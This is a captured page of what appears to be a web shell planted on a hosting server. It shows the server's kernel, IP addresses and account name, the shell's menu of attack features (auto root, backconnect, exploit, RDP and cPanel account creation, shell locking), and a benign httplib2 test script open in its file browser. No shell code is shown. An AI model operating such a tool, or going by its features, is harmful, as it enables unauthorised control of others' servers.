Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
httplib2 /
script /
[ HOME SHELL ]
Name
Size
Permission
Action
compile-py3-openssl11.sh
2.1
KB
-rw-r--r--
generate-tls
2.16
KB
-rw-r--r--
release
6.22
KB
-rw-r--r--
test
1.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test
#!/bin/bash set -eux # By default, run tests with pytest-forked plugin, # disable in terminal for debugging, you may add --forked flag_forked="--forked" if [[ -z "${CI:-}" ]] && [[ -t 1 ]] ; then flag_forked="" fi test_flags=( $@ $flag_forked tests/ ) main() { cd "$( dirname "${BASH_SOURCE[0]}" )/.." if [[ -n "${CI:-}" ]] ; then case "${test_group-}" in package) # TODO: sdist bdist_wheel # but wheels don't roll well with our 2/3 split code base python setup.py sdist install_check_version "pip" ;; *) pip install -e . httplib2_test_still_run_skipped=1 pytest --fulltrace -k test_303 $@ tests/ || true httplib2_test_still_run_skipped=1 pytest --fulltrace -k test_head_301 $@ tests/ || true pytest --fulltrace ${test_flags[@]} ;; esac else if [[ ! -d ./venv-27 ]] ; then virtualenv --python=python2.7 ./venv-27 fi if [[ ! -d ./venv-36 ]] ; then virtualenv --python=python3.6 ./venv-36 fi ./venv-27/bin/pip install -e . -r requirements-test.txt ./venv-27/bin/pytest ${test_flags[@]} ./venv-36/bin/pip install -e . -r requirements-test.txt ./venv-36/bin/pytest ${test_flags[@]} # FIXME: too many errors # ./venv-27/bin/flake8 python2/ # ./venv-36/bin/flake8 python3/ tests/ # TODO: sdist bdist_wheel # but wheels don't roll well with our 2/3 split code base ./venv-36/bin/python setup.py sdist install_check_version "./venv-27/bin/pip" install_check_version "./venv-36/bin/pip" fi rm -rf ./_httplib2_test_cache } install_check_version() { local pip="$1" $pip install dist/httplib2* version_source=$(python setup.py --version) version_installed=$($pip show httplib2 |fgrep Version: |cut -d' ' -f2) if [[ "$version_source" != "$version_installed" ]] ; then echo "error: installed package version=$version_installed does not match source=$version_source" >&2 exit 1 fi } main "$@"
Close